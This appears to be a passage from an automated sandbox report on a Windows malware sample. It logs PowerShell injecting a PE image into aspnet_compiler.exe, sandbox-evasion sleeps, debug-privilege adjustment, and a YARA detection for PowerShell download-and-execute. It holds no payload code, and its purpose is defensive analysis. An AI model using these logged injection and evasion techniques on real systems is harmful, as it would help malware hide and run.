      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4694
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4559
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 2074
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 7003
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: foregroundWindowGot 651
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: foregroundWindowGot 544
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984Thread sleep time: -4611686018427385s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6928Thread sleep time: -15679732462653109s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates
      Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: aspnet_compiler.exe, 00000016.00000002.1174819940.0000000005300000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: ModuleAnalysisCache.3.drBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: aspnet_compiler.exe, 00000016.00000002.1174819940.0000000005300000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: aspnet_compiler.exe, 00000016.00000002.1174819940.0000000005300000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: powershell.exe, 00000003.00000003.971167113.000001EA3FF43000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln8A!
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: aspnet_compiler.exe, 00000016.00000002.1174819940.0000000005300000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Yara detected Powershell download and executeShow sources
      Source: Yara matchFile source: C:\Users\user\Documents\20210803\PowerShell_transcript.301389.iaYgJ3Zj.20210803203913.txt, type: DROPPED
      .NET source code references suspicious native API functionsShow sources
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.csReference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, L.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
      Injects a PE file into a foreign processesShow sources
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
      Writes to foreign memory regionsShow sources
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 420000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 422000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 772008
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 40A000
